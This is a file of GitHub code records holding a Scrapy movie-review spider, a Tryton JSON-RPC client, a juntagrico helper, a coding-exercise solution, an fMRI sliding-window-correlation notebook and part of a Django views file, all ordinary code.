+{"seq_id":"11793122926","text":"import scrapy\nfrom mymovie.items import MymovieItem\n\n# list타입의 descs가 param & list 형태로 반환\n# descs : 40개의 데이터 (공백포함) -> 10개의 데이터 (공백제거) \ndef remove_space(descs:list) -> list:\n result=[]\n for i in range(len(descs)) :\n if len(descs[i].strip()) > 0:\n result.append(descs[i].strip()) \n return result\n\nclass MymovieBotsSpider(scrapy.Spider):\n name = 'mymovie_bots'\n allowed_domains = ['naver.com']\n start_urls = ['http://movie.naver.com/movie/point/af/list.nhn']\n\n def parse(self, response):\n titles = response.xpath('//*[@id=\"old_content\"]/table/tbody/tr/td[2]/a[1]/text()').extract()\n stars = response.xpath('//*[@id=\"old_content\"]/table/tbody/tr/td[2]/div/em/text()').extract()\n descs = response.xpath('//*[@id=\"old_content\"]/table/tbody/tr/td[2]/text()').extract()\n converted_descs = remove_space(descs)\n\n writers = response.css('.author::text').extract()\n dates = response.xpath('//*[@id=\"old_content\"]/table/tbody/tr/td[3]/text()').extract()\n\n for row in zip (titles, stars, converted_descs, writers, dates) :\n item = MymovieItem()\n item['title'] = row[0]\n item['star'] = row[1]\n item['desc'] = row[2]\n item['writer'] = row[3]\n item['date'] = row[4]\n\n yield item # return과 기능은 동일하나, generator도 포함\n\n # items = []\n # for idx in range(len(titles)):\n # item = MymovieItem()\n # item['title'] = titles[idx]\n # item['star'] = stars[idx]\n # item['desc'] = converted_descs[idx]\n # item['writer'] = writers[idx]\n # item['date'] = dates[idx]\n\n # items.append(item)\n # return items","repo_name":"mementohaeri/TIL","sub_path":"web_scrapnig/scrapy/mymovie/mymovie/spiders/mymovie_bots.py","file_name":"mymovie_bots.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14797053998","text":"from django.utils.translation import gettext as _\n\nfrom juntagrico.config import Config\n\n\"\"\"\n c means case\n\"\"\"\n\n\ndef enriched_organisation(c):\n g = Config.organisation_name_config()['gender'].upper()\n if (c == 'N' and g == 'M') or ((c == 'G' or c == 'D') and g == 'F'):\n article = _('der')\n elif c == 'G' and (g == 'M' or g == 'N'):\n article = _('des')\n elif c == 'D' and (g == 'M' or g == 'N'):\n article = _('dem')\n elif c == 'A' and g == 'M':\n article = _('den')\n elif (c == 'N' or c == 'A') and g == 'F':\n article = _('die')\n elif (c == 'N' or c == 'A') and g == 'N':\n article = _('des')\n else:\n article = ''\n\n name = article + ' ' + \\\n Config.organisation_name_config(\n )['type'] + ' ' + Config.organisation_name()\n\n return name.strip()\n","repo_name":"juntagrico/juntagrico","sub_path":"juntagrico/util/organisation_name.py","file_name":"organisation_name.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"61"}
+{"seq_id":"8612273372","text":"import base64\nimport datetime\nimport errno\nimport hashlib\nimport http.client\nimport json\nimport logging\nimport socket\nimport ssl\nimport threading\nimport xmlrpc.client\nfrom collections import defaultdict\nfrom contextlib import contextmanager\nfrom decimal import Decimal\nfrom functools import partial, reduce\nfrom urllib.parse import quote, urljoin\n\n__all__ = [\"ResponseError\", \"Fault\", \"ProtocolError\", \"Transport\",\n \"ServerProxy\", \"ServerPool\"]\nCONNECT_TIMEOUT = 5\nDEFAULT_TIMEOUT = None\nlogger = logging.getLogger(__name__)\n\n\ndef deepcopy(obj):\n \"\"\"Recursively copy python mutable datastructures\"\"\"\n if isinstance(obj, (list, tuple)):\n return [deepcopy(o) for o in obj]\n elif isinstance(obj, dict):\n return {k: deepcopy(v) for k, v in obj.items()}\n else:\n return obj\n\n\nclass ResponseError(xmlrpc.client.ResponseError):\n pass\n\n\nclass Fault(xmlrpc.client.Fault):\n\n def __init__(self, faultCode, faultString='', **extra):\n super(Fault, self).__init__(faultCode, faultString, **extra)\n self.args = faultString\n\n def __str__(self):\n return str(self.faultCode)\n\n\nclass ProtocolError(xmlrpc.client.ProtocolError):\n pass\n\n\ndef object_hook(dct):\n if '__class__' in dct:\n if dct['__class__'] == 'datetime':\n return datetime.datetime(dct['year'], dct['month'], dct['day'],\n dct['hour'], dct['minute'], dct['second'], dct['microsecond'])\n elif dct['__class__'] == 'date':\n return datetime.date(dct['year'], dct['month'], dct['day'])\n elif dct['__class__'] == 'time':\n return datetime.time(dct['hour'], dct['minute'], dct['second'],\n dct['microsecond'])\n elif dct['__class__'] == 'timedelta':\n return datetime.timedelta(seconds=dct['seconds'])\n elif dct['__class__'] == 'bytes':\n return base64.decodebytes(dct['base64'].encode('utf-8'))\n elif dct['__class__'] == 'Decimal':\n return Decimal(dct['decimal'])\n return dct\n\n\nclass JSONEncoder(json.JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, datetime.date):\n if isinstance(obj, datetime.datetime):\n return {'__class__': 'datetime',\n 'year': obj.year,\n 'month': obj.month,\n 'day': obj.day,\n 'hour': obj.hour,\n 'minute': obj.minute,\n 'second': obj.second,\n 'microsecond': obj.microsecond,\n }\n return {'__class__': 'date',\n 'year': obj.year,\n 'month': obj.month,\n 'day': obj.day,\n }\n elif isinstance(obj, datetime.time):\n return {'__class__': 'time',\n 'hour': obj.hour,\n 'minute': obj.minute,\n 'second': obj.second,\n 'microsecond': obj.microsecond,\n }\n elif isinstance(obj, datetime.timedelta):\n return {'__class__': 'timedelta',\n 'seconds': obj.total_seconds(),\n }\n elif isinstance(obj, bytes):\n return {'__class__': 'bytes',\n 'base64': base64.encodebytes(obj).decode('utf-8'),\n }\n elif isinstance(obj, Decimal):\n return {'__class__': 'Decimal',\n 'decimal': str(obj),\n }\n return super(JSONEncoder, self).default(obj)\n\n\nclass JSONParser(object):\n\n def __init__(self, target):\n self.__targer = target\n\n def feed(self, data):\n self.__targer.feed(data)\n\n def close(self):\n pass\n\n\nclass JSONUnmarshaller(object):\n def __init__(self):\n self.data = []\n\n def feed(self, data):\n self.data.append(data.decode('utf-8'))\n\n def close(self):\n return json.loads(''.join(self.data), object_hook=object_hook)\n\n\nclass Transport(xmlrpc.client.SafeTransport):\n\n accept_gzip_encoding = True\n encode_threshold = 1400 # common MTU\n\n def __init__(\n self, fingerprints=None, ca_certs=None, session=None):\n 
xmlrpc.client.Transport.__init__(self)\n self._connection = (None, None)\n self.__fingerprints = fingerprints\n self.__ca_certs = ca_certs\n self.session = session\n\n def getparser(self):\n target = JSONUnmarshaller()\n parser = JSONParser(target)\n return parser, target\n\n def parse_response(self, response):\n cache = None\n if hasattr(response, 'getheader'):\n cache = int(response.getheader('X-Tryton-Cache', 0))\n response = super().parse_response(response)\n if cache:\n try:\n response['cache'] = int(cache)\n except ValueError:\n pass\n return response\n\n def get_host_info(self, host):\n host, extra_headers, x509 = xmlrpc.client.Transport.get_host_info(\n self, host)\n if extra_headers is None:\n extra_headers = []\n if self.session:\n auth = base64.encodebytes(\n self.session.encode('utf-8')).decode('ascii')\n auth = ''.join(auth.split()) # get rid of whitespace\n extra_headers.append(\n ('Authorization', 'Session ' + auth),\n )\n extra_headers.append(('Connection', 'keep-alive'))\n return host, extra_headers, x509\n\n def send_headers(self, connection, headers):\n for key, val in headers:\n if key == 'Content-Type':\n val = 'application/json'\n connection.putheader(key, val)\n\n def make_connection(self, host):\n if self._connection and host == self._connection[0]:\n return self._connection[1]\n chost, self._extra_headers, x509 = self.get_host_info(host)\n\n ssl_ctx = ssl.create_default_context(cafile=self.__ca_certs)\n\n def http_connection():\n self._connection = host, http.client.HTTPConnection(chost,\n timeout=CONNECT_TIMEOUT)\n self._connection[1].connect()\n sock = self._connection[1].sock\n sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n\n def https_connection(allow_http=False):\n self._connection = host, http.client.HTTPSConnection(chost,\n timeout=CONNECT_TIMEOUT, context=ssl_ctx)\n try:\n self._connection[1].connect()\n sock = self._connection[1].sock\n sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n try:\n peercert = sock.getpeercert(True)\n except socket.error:\n peercert = None\n\n def format_hash(value):\n return reduce(lambda x, y: x + y[1].upper()\n + ((y[0] % 2 and y[0] + 1 < len(value)) and ':' or ''),\n enumerate(value), '')\n return format_hash(hashlib.sha1(peercert).hexdigest())\n except (socket.error, ssl.SSLError, ssl.CertificateError):\n if allow_http:\n http_connection()\n else:\n raise\n\n fingerprint = ''\n if (self.__fingerprints is not None\n and self.__fingerprints.exists(chost)):\n if self.__fingerprints.get(chost):\n fingerprint = https_connection()\n else:\n http_connection()\n else:\n fingerprint = https_connection(allow_http=True)\n\n if self.__fingerprints is not None:\n self.__fingerprints.set(chost, fingerprint)\n self._connection[1].timeout = DEFAULT_TIMEOUT\n self._connection[1].sock.settimeout(DEFAULT_TIMEOUT)\n return self._connection[1]\n\n\nclass ServerProxy(xmlrpc.client.ServerProxy):\n __id = 0\n\n def __init__(self, host, port, database='', verbose=0,\n fingerprints=None, ca_certs=None, session=None, cache=None):\n self.__host = '%s:%s' % (host, port)\n if database:\n database = quote(database)\n self.__handler = '/%s/' % database\n else:\n self.__handler = '/'\n self.__transport = Transport(fingerprints, ca_certs, session)\n self.__verbose = verbose\n self.__cache = cache\n\n def __request(self, methodname, params):\n dumper = partial(json.dumps, cls=JSONEncoder, separators=(',', ':'))\n 
self.__id += 1\n id_ = self.__id\n if self.__cache and self.__cache.cached(methodname):\n try:\n return self.__cache.get(methodname, dumper(params))\n except KeyError:\n pass\n request = dumper({\n 'id': id_,\n 'method': methodname,\n 'params': params,\n }).encode('utf-8')\n\n try:\n try:\n response = self.__transport.request(\n self.__host,\n self.__handler,\n request,\n verbose=self.__verbose\n )\n except (socket.error, http.client.HTTPException) as v:\n if (isinstance(v, socket.error)\n and v.args[0] == errno.EPIPE):\n raise\n # try one more time\n self.__transport.close()\n response = self.__transport.request(\n self.__host,\n self.__handler,\n request,\n verbose=self.__verbose\n )\n except xmlrpc.client.ProtocolError as e:\n raise Fault(str(e.errcode), e.errmsg)\n except Exception:\n self.__transport.close()\n raise\n if response['id'] != id_:\n raise ResponseError('Invalid response id (%s) excpected %s' %\n (response['id'], id_))\n if response.get('error'):\n raise Fault(*response['error'])\n if self.__cache and response.get('cache'):\n self.__cache.set(\n methodname, dumper(params), response['cache'],\n response['result'])\n return response['result']\n\n def close(self):\n self.__transport.close()\n\n @property\n def ssl(self):\n return isinstance(self.__transport.make_connection(self.__host),\n http.client.HTTPSConnection)\n\n @property\n def url(self):\n scheme = 'https' if self.ssl else 'http'\n return urljoin(scheme + '://' + self.__host, self.__handler)\n\n\nclass ServerPool(object):\n keep_max = 4\n _cache = None\n\n def __init__(self, host, port, database, *args, **kwargs):\n if kwargs.get('cache'):\n self._cache = kwargs['cache'] = _Cache()\n self.ServerProxy = partial(\n ServerProxy, host, port, database, *args, **kwargs)\n\n self._host = host\n self._port = port\n self._database = database\n\n self._lock = threading.Lock()\n self._pool = []\n self._used = {}\n self.session = kwargs.get('session')\n\n def getconn(self):\n with self._lock:\n if self._pool:\n conn = self._pool.pop()\n else:\n conn = self.ServerProxy()\n self._used[id(conn)] = conn\n return conn\n\n def putconn(self, conn):\n with self._lock:\n self._pool.append(conn)\n del self._used[id(conn)]\n\n # Remove oldest connections\n while len(self._pool) > self.keep_max:\n conn = self._pool.pop()\n conn.close()\n\n def close(self):\n with self._lock:\n for conn in self._pool + list(self._used.values()):\n conn.close()\n self._pool = []\n self._used.clear()\n\n @property\n def ssl(self):\n for conn in self._pool + list(self._used.values()):\n return conn.ssl\n return None\n\n @property\n def url(self):\n for conn in self._pool + list(self._used.values()):\n return conn.url\n\n @contextmanager\n def __call__(self):\n conn = self.getconn()\n yield conn\n self.putconn(conn)\n\n def clear_cache(self, prefix=None):\n if self._cache:\n self._cache.clear(prefix)\n\n\nclass _Cache:\n\n def __init__(self):\n self.store = defaultdict(dict)\n\n def cached(self, prefix):\n return prefix in self.store\n\n def set(self, prefix, key, expire, value):\n if isinstance(expire, (int, float)):\n expire = datetime.timedelta(seconds=expire)\n if isinstance(expire, datetime.timedelta):\n expire = datetime.datetime.now() + expire\n self.store[prefix][key] = (expire, deepcopy(value))\n\n def get(self, prefix, key):\n now = datetime.datetime.now()\n try:\n expire, value = self.store[prefix][key]\n except ValueError:\n raise KeyError\n if expire < now:\n self.store.pop(key)\n raise KeyError\n logger.info('(cached) %s %s', prefix, key)\n return 
deepcopy(value)\n\n def clear(self, prefix=None):\n if prefix:\n self.store[prefix].clear()\n else:\n self.store.clear()\n","repo_name":"tryton/tryton-client","sub_path":"tryton/jsonrpc.py","file_name":"jsonrpc.py","file_ext":"py","file_size_in_byte":13468,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"61"}
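The encoder and object_hook in the jsonrpc record above round-trip rich Python values through JSON by tagging them with a __class__ key. The miniature below re-implements just the datetime part of that convention for illustration; it is a standalone sketch, not an import from the Tryton module.

```python
# Standalone miniature of the `__class__`-tagged JSON convention (datetime only).
import datetime
import json

class TaggedEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, datetime.datetime):
            return {'__class__': 'datetime', 'year': obj.year, 'month': obj.month,
                    'day': obj.day, 'hour': obj.hour, 'minute': obj.minute,
                    'second': obj.second, 'microsecond': obj.microsecond}
        return super().default(obj)

def tagged_hook(dct):
    if dct.get('__class__') == 'datetime':
        return datetime.datetime(dct['year'], dct['month'], dct['day'],
                                 dct['hour'], dct['minute'], dct['second'],
                                 dct['microsecond'])
    return dct

if __name__ == "__main__":
    original = {'id': 1, 'params': [datetime.datetime(2024, 1, 2, 3, 4, 5)]}
    wire = json.dumps(original, cls=TaggedEncoder)
    assert json.loads(wire, object_hook=tagged_hook) == original
    print(wire)
```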
+{"seq_id":"200802088","text":"import sys\n\ndef get_key(k):\n\tfor key, value in nlst.items():\n\t\tif k == value:\n\t\t\treturn int(key) + 1\n\ninput = sys.stdin.readline\nn, m = map(int, input().split())\nnlst = {i : input().rstrip(\"\\n\") for i in range(n)}\nrev_nlst = dict(map(reversed, nlst.items()))\nmlst = [input().rstrip(\"\\n\") for _ in range(m)]\nfor i in mlst:\n\tif i.isdigit() == True:\n\t\tprint(nlst[int(i) - 1])\n\telse:\n\t\tprint(rev_nlst[i] + 1)","repo_name":"Zerotay/Baekjoon","sub_path":"step_by_step/step_13/1620.py","file_name":"1620.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7019403202","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.9.1\n# kernelspec:\n# display_name: python/3.8\n# language: python\n# name: py3.8\n# ---\n\n# # Description: SWC + Embeddings\n#\n# This notebook performs the following analysis steps:\n#\n# 1) Load ROI representative time series (those must already exists in text file format)\n#\n# 2) Plots static FC matrix, as well as a carpet plot\n#\n# 3) Dimensionality Reduction from ROI to PCA components (whole time-series)\n#\n# 4) Compute Sliding Window Correlation based on PCA representative time series\n#\n# 5) Generate 3D Laplacian Embeddings\n\n# %%time\nimport pickle\nimport os.path as osp\nimport pandas as pd\nimport xarray as xr\nimport numpy as np\nfrom nilearn.plotting import plot_matrix\nfrom scipy.signal import tukey, hamming\nfrom sklearn.manifold import SpectralEmbedding\nfrom sklearn.neighbors import kneighbors_graph\nfrom scipy.spatial.distance import correlation as dis_corr\nfrom utils.base import plot_fc_matrix, compute_swc, reduce_dimensionality_pca\nimport hvplot.pandas\nimport hvplot.xarray\nimport holoviews as hv\nimport panel as pn\nfrom holoviews import dim, opts\nhv.extension('bokeh')\npn.extension()\n\nseed = np.random.RandomState(seed=3)\n\nPRJDIR='/data/SFIM_Vigilance/PRJ_Vigilance_Smk01/'\nsubjects = ['sub-521', 'sub-551', 'sub-552', 'sub-632', 'sub-634','sub-664', 'sub-680', 'sub-681', 'sub-682', 'sub-686',\n 'sub-694', 'sub-699', 'sub-700', 'sub-704', 'sub-706','sub-713', 'sub-714', 'sub-720', 'sub-721', 'sub-739',\n 'sub-750', 'sub-751', 'sub-766', 'sub-789']\n\n# +\nSBJ = subjects[17]\natlas_name = 'Craddock_T2Level_0200'\nTR = 2.0\nWL_sec = 30\nWS_trs = 1\nWL_trs = int(WL_sec / TR)\ndim_red_method = 'PCA'\ndim_red_method_percent = 85\nle_num_dims = 3\nle_k_NN = 100\n\npath_ts = osp.join(PRJDIR,'PrcsData',SBJ,'D02_Preproc_fMRI','errts.'+SBJ+'.Craddock_T2Level_0200.wl'+str(WL_sec).zfill(3)+'s.fanaticor_ts.1D')\npath_outdir = osp.join(PRJDIR,'PrcsData',SBJ,'D02_Preproc_fMRI')\nout_prefix = SBJ+'_fanaticor_'+atlas_name+'_wl'+str(WL_sec).zfill(3)+'s_ws'+str(WS_trs*TR).zfill(3)+'s'\nout_pca_path = osp.join(path_outdir,out_prefix+'_'+dim_red_method+'_vk'+str(dim_red_method_percent)+'.pca_obj.pkl')\nout_pcats_path = osp.join(path_outdir,out_prefix+'_'+dim_red_method+'_vk'+str(dim_red_method_percent)+'.pca_ts.pkl')\nout_swc_path = osp.join(path_outdir,out_prefix+'_'+dim_red_method+'_vk'+str(dim_red_method_percent)+'.swcorr.pkl')\nout_lem_path = osp.join(path_outdir,out_prefix+'_'+dim_red_method+'_vk'+str(dim_red_method_percent)+'.le'+str(le_num_dims)+'d_knn'+str(le_k_NN).zfill(3)+'.pkl')\n\nprint('++ INFO: Selection Parameters: ')\nprint(' + Subject : %s' % SBJ)\nprint(' + Atlas : %s' % atlas_name)\nprint(' + SWC : wl=%ss, ws=%ss, dim_red=%s, extra-->%s' % (str(WL_sec),str(WS_trs*TR),dim_red_method,'vk='+str(dim_red_method_percent)+'%'))\nprint(' + Timeseries File : %s' % path_ts)\nprint(' + -----------------------------------------------------------')\nprint('++ INFO: Laplacian Embedding Settings: ')\nprint(' + Number of Dimensions: %d' % le_num_dims)\nprint(' + K-Nearest Neighbors : %d' % le_k_NN)\nprint(' + Distance Metric: correlation distance')\nprint('++ -----------------------------------------------------------')\nprint(' + INFO: Outputs:')\nprint(' + Output Folder : %s' % path_outdir)\nprint(' + PCA Object File : %s' % out_pca_path)\nprint(' + PCA Timeseries File : %s' % 
out_pcats_path)\nprint(' + SWC File : %s' % out_swc_path)\nprint(' + LE File : %s' % out_lem_path)\n# -\n\n# ***\n# ### 1. Load ROI Timeseries\n#\n# First, we load the time series for all representative ROIs, and show a static functional connectivity matrix and a carpet plot. This may help capture some issues with the data.\n\n# +\n# %%time\nts_df = pd.read_csv(path_ts, sep='\\t', header=None)\nNacq,Nrois = ts_df.shape\n# Generate ROI names\n# ------------------\n# Those are default names, but it would be useful to have a file per atlas that contains the names\n# and we load it here.\nroi_names = ['ROI'+str(r+1).zfill(3) for r in range(Nrois)]\n\n# Put timeseries also in Xarray form. This is necessary for plotting purposes via hvplot.Image\n# --------------------------------------------------------------------------------------------\nts_xr = xr.DataArray(ts_df.values,dims=['Time [TRs]','ROIs'])\n\n# Show a summary of the data being loaded.\n# ----------------------------------------\nprint('++ INFO: Time-series loaded into memory [N_acq=%d, N_rois=%d]' % (Nacq, Nrois))\nts_df.head()\n\n# +\n# %%time\n# Generate Plot of Static Functional connectivity matrix\n# ======================================================\nfc_matrix_plot = plot_fc_matrix(ts_df,roi_names,'single')\n\n# Generate Timeseries carpet plot\nts_carpet_plot = ts_xr.hvplot.image(cmap='gray', width=1500, colorbar=True, title='ROI Timeseries (carpet plot) - Subject: %s' % SBJ).opts(colorbar_position='bottom')\nts_roi_plot = ts_df[0].hvplot(cmap='gray',width=1500,height=100)\n# Show both plots side-by-side using panel\npn.Row(fc_matrix_plot, pn.Column(ts_carpet_plot,ts_roi_plot))\n# -\n\n# ***\n# ### 2. Dimensionality Reduction\n#\n# Here we reduce the dimensionality of the data via PCA. The goal is to have a smaller connectivity matrix, therefore we go from X number of ROIs to a Y number of PCA components, with Y hopefully being much smaller than X.\n#\n# * How many components are kept depends on the amount of variance we keep (default is 97.5%) \n\n# %%time\nts_pca_df, pca_plot, pca = reduce_dimensionality_pca(ts_df,dim_red_method_percent,sbj_id=SBJ)\npickle.dump(pca, open(out_pca_path, \"wb\" ) )\nts_pca_df.to_pickle(out_pcats_path)\n\npca_plot\n\n# ***\n# ### 4. Create SWC Matrix\n\n# %%time\n# Create a tukey (or tappered window) of the appropriate length\n# =============================================================\n#window = tukey(WL_trs,.2)\nwindow = np.ones((WL_trs,))\npd.DataFrame(window).hvplot(title='Sliding Window Shape',xlabel='Time [TRs]',ylabel='Amplitude')\n\n# %%time\n# Compute sliding window correlation\n# ==================================\nswc_r, swc_Z, winInfo = compute_swc(ts_pca_df,WL_trs,WS_trs,window=window)\nxr.DataArray(swc_Z.values.T,dims=['Time [Window ID]','PCA Connection']).hvplot.image(title='SWC Matrix - Fisher Z', cmap='RdBu').redim.range(value=(-1,1)).opts(width=1700)\n\n# ***\n# ### 4. 
Generate Laplacian Embedding\n\n# %%time\nse = SpectralEmbedding(n_components=le_num_dims, affinity='precomputed', n_jobs=32, random_state=seed)\nX_affinity = kneighbors_graph(swc_Z.T,le_k_NN,include_self=True,n_jobs=32, metric=dis_corr)\nX_affinity = 0.5 * (X_affinity + X_affinity.T)\nse_X = se.fit_transform(X_affinity.toarray())\nprint ('++ INFO: Embedding Dimensions: %s' % str(se_X.shape))\n\n# +\n# Put the embeddings into a dataframe (for saving and plotting)\n# =============================================================\nLE3D_df = pd.DataFrame(columns=['x','y','z','x_norm','y_norm','z_norm','color_int','color_rgb','label'])\nLE3D_df['x'] = se_X[:,0]\nLE3D_df['y'] = se_X[:,1]\nLE3D_df['z'] = se_X[:,2]\n# Note: there is a change in scale between scikit-learn 0.19 and 0.23 when it comes to the laplacian embeddings.\n# I checked a few examples and the structure is the same, but the scale is different. To be able to represent all cases\n# on the same scale (and given that the dimensions are meaningless), I create this normalized version of the low dimensional embedding\nLE3D_df[['x_norm','y_norm','z_norm']]= LE3D_df[['x','y','z']]/LE3D_df[['x','y','z']].max()\n# External-data based color\nLE3D_df['color_int'] = [(255,255,255) for i in range(winInfo['numWins'])]\nLE3D_df['color_rgb'] = ['#ffffff' for i in range(winInfo['numWins'])]\n# Time-based color\n\n# Window Names\nLE3D_df['label'] = winInfo['winNames']\nLE3D_df.head()\nLE3D_df.to_pickle(out_lem_path)\n# -\n\nhv.extension('plotly')\npn.extension('plotly')\n\nplayer = pn.widgets.Player(name='Player', start=0, end=winInfo['numWins'], value=1, loop_policy='loop', width=800, step=1)\n@pn.depends(player.param.value)\ndef plot_embed3d(max_win):\n output = hv.Scatter3D((LE3D_df['x_norm'][0:max_win],\n LE3D_df['y_norm'][0:max_win],\n LE3D_df['z_norm'][0:max_win])).opts(color=LE3D_df['color_rgb'][0:max_win],\n size=5, \n xlim=(-1,1), \n ylim=(-1,1), \n zlim=(-1,1), aspect={'x':1,'y':1,'z':1}, camera_zoom=1, margins=(5,5,5,5), height=800, width=800)\n return output\npn.Column(player,plot_embed3d)\n\n# ### Test with PNAS 2015 Results (for consistency)\n# ***\n\n# Load Pre-computed results in MATLAB from one task-based subject from NI2019 \nfrom scipy.io import loadmat\nDATAFILE = osp.join('/data/SFIMJGC_HCP7T/PRJ_CognitiveStateDetection02',\n 'PrcsData_PNAS2015','SBJ06'+'/D02_CTask001/'+'SBJ06'+'_CTask001_WL'+str(30).zfill(3)+'_WS01_NROI0200_dF.mat')\nDATAMAT = loadmat(DATAFILE)\npnas2015orig_ts_df = pd.DataFrame(DATAMAT['origTS'])\npnas2015orig_Nacq,pnas2015orig_Nrois = pnas2015orig_ts_df.shape\npnas2015orig_roi_names = ['ROI'+str(r+1).zfill(3) for r in range(pnas2015orig_Nrois)]\npnas2015orig_tr = DATAMAT['TR'][0][0]\npnas2015orig_ts_xr = xr.DataArray(pnas2015orig_ts_df.values,dims=['Time [TRs]','ROIs'])\nprint('++ Loaded this data: %s' % DATAFILE)\n\n# Generate Plot of Functional connectivity matrix\npnas2015orig_fc_matrix_plot = plot_fc_matrix(pnas2015orig_ts_df,pnas2015orig_roi_names,'single')\n# Generate Timeseries carpet plot\npnas2015orig_ts_carpet_plot = pnas2015orig_ts_xr.hvplot.image(cmap='gray', width=1500, colorbar=True, title='ROI Timeseries (carpet plot) - Subject: %s' % 'SBJ06').opts(colorbar_position='bottom')\npnas2015orig_ts_roi_plot = pnas2015orig_ts_df[0].hvplot(cmap='gray',width=1500,height=100)\n\n# +\npn.Row(pnas2015orig_fc_matrix_plot, pnas2015orig_ts_carpet_plot)\n\n# PCA Step\npnas2015python_ts_pca_df, pnas2015python_pca_plot, pnas2015python_pca = reduce_dimensionality_pca(pnas2015orig_ts_df,97.5,sbj_id='SBJ06', 
n_comp=None)\npnas2015orig_ts_pca_df = pd.DataFrame(DATAMAT['dimRedTS'])\nprint('++ INFO: PCA (as matlad did it) --> %d components' % pnas2015orig_ts_pca_df.shape[1])\nprint('++ INFO: PCA (as python does it) --> %d components' % pnas2015python_ts_pca_df.shape[1])\npnas2015python_pca_plot\n# -\n\npnas2015python_ts_pca_df['PC083'].hvplot(width=1700) * \\\npnas2015orig_ts_pca_df[83].hvplot().opts(line_dash='dashed')\n\n# Create a tukey (or tappered window) of the appropriate length\n# =============================================================\npnas2015orig_wl_trs = DATAMAT['WL'][0][0]\npnas2015orig_ws_trs = DATAMAT['WS'][0][0]\npnas2015python_window = np.ones((pnas2015orig_wl_trs,))\npnas2015orig_swc_Z = pd.DataFrame(DATAMAT['CB']['snapshots'][0][0].T)\npnas2015python_swc_r, pnas2015python_swc_Z, pnas2015python_winInfo = compute_swc(pnas2015python_ts_pca_df,pnas2015orig_wl_trs,pnas2015orig_ws_trs,window=pnas2015python_window)\n\nxr.DataArray(pnas2015orig_swc_Z.values.T - pnas2015python_swc_Z.values.T,dims=['Time [Window ID]','PCA Connection']).hvplot.image(title='SWC Matrix - Fisher Z', cmap='RdBu_r').redim.range(value=(-1,1)).opts(width=500)\n\nnCom = 3\nk_NN = 100\nseed = np.random.RandomState(seed=5)\n\nstart_time = time.time()\nX = DATAMAT['CB']['snapshots'][0][0]\n#X = pnas2015_swc_Z.T\npnas2015_se = SpectralEmbedding(n_components=nCom, affinity='precomputed', n_jobs=32, random_state=seed)\npnas2015_X_affinity = kneighbors_graph(X,k_NN,include_self=True,n_jobs=32, metric=dis_corr)\npnas2015_X_affinity = 0.5 * (pnas2015_X_affinity + pnas2015_X_affinity.T)\npnas2015_se_X = pnas2015_se.fit_transform(pnas2015_X_affinity.toarray())\nend_time = time.time()\nprint ('++ INFO: Elapset Time: '+ str(end_time - start_time))\nprint ('++ INFO: Embedding Dimensions: %s' % str(pnas2015_se_X.shape))\n\naux_color_int = DATAMAT['winInfo']['color'][0][0]\naux_color_rgb = [ '#%02x%02x%02x' % (int(aux_color_int[i,0]*255), \n int(aux_color_int[i,1]*255), \n int(aux_color_int[i,2]*255)) for i in np.arange(pnas2015python_winInfo['numWins'])]\naux_win_labels = DATAMAT['winInfo']['winNames'][0][0]\nembedding_df = pd.DataFrame(columns=['x','y','z','x_norm','y_norm','z_norm','color_int','color_rgb','label'])\nembedding_df['x'] = pnas2015_se_X[:,0]\nembedding_df['y'] = pnas2015_se_X[:,1]\nembedding_df['z'] = pnas2015_se_X[:,2]\nembedding_df[['x_norm','y_norm','z_norm']]= embedding_df[['x','y','z']]/embedding_df[['x','y','z']].max()\nembedding_df['color_int'] = tuple(aux_color_int)\nembedding_df['color_rgb'] = aux_color_rgb\nembedding_df['label'] = aux_win_labels\nembedding_df.head()\nembedding_df.to_pickle('./test_embed.pkl')\n\nhv.extension('plotly')\npn.extension('plotly')\n\nNwins = embedding_df.shape[0]\nplayer = pn.widgets.Player(name='Player', start=0, end=Nwins, value=1, loop_policy='loop', width=800, step=1)\n@pn.depends(player.param.value)\ndef plot_embed3d(max_win):\n output = hv.Scatter3D((embedding_df['x_norm'][0:max_win],\n embedding_df['y_norm'][0:max_win],\n embedding_df['z_norm'][0:max_win])).opts(color=embedding_df['color_rgb'][0:max_win],\n size=5, \n xlim=(-1,1), \n ylim=(-1,1), \n zlim=(-1,1), aspect={'x':1,'y':1,'z':1}, camera_zoom=1, margins=(5,5,5,5), height=800, width=800)\n return output\npn.Column(player,plot_embed3d)\n\n\n","repo_name":"javiergcas/PRJ_Vigilance_Smk01","sub_path":"Notebooks/N01_SWC.py","file_name":"N01_SWC.py","file_ext":"py","file_size_in_byte":13920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3482545472","text":"from django.shortcuts import render, HttpResponse,render_to_response,redirect\nfrom hostmanager import models\nimport json\nfrom django import forms\nfrom django.forms import widgets\nfrom django.forms import fields\nfrom django.forms import models as form_model\n\n# Create your views here.\n\n\nclass User(forms.Form):\n # 字段本身只能验证,内含插件生成html\n name = fields.CharField(\n widget=widgets.Input(attrs={'class': 'form-control', 'placeholder': 'Name'}),\n max_length=20,\n error_messages={\n 'required': '用户名不能为空',\n 'min_length': '最小长度为6',\n }\n )\n pwd = fields.CharField(\n widget=widgets.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),\n error_messages={\n 'required': '密码不能为空',\n }\n )\n\n ugrup = fields.ChoiceField(\n initial=1,\n choices=models.User.type_choices,\n widget=widgets.Select(attrs={'class': 'form-control'})\n\n )\n # print(models.User.type_choices)\n # a = form_model.ModelChoiceField(queryset=models.User.objects.ugrup)\n\n\ndef lg(func): # 验证用户登录装饰器\n def wrap(request, *args, **kwargs):\n # 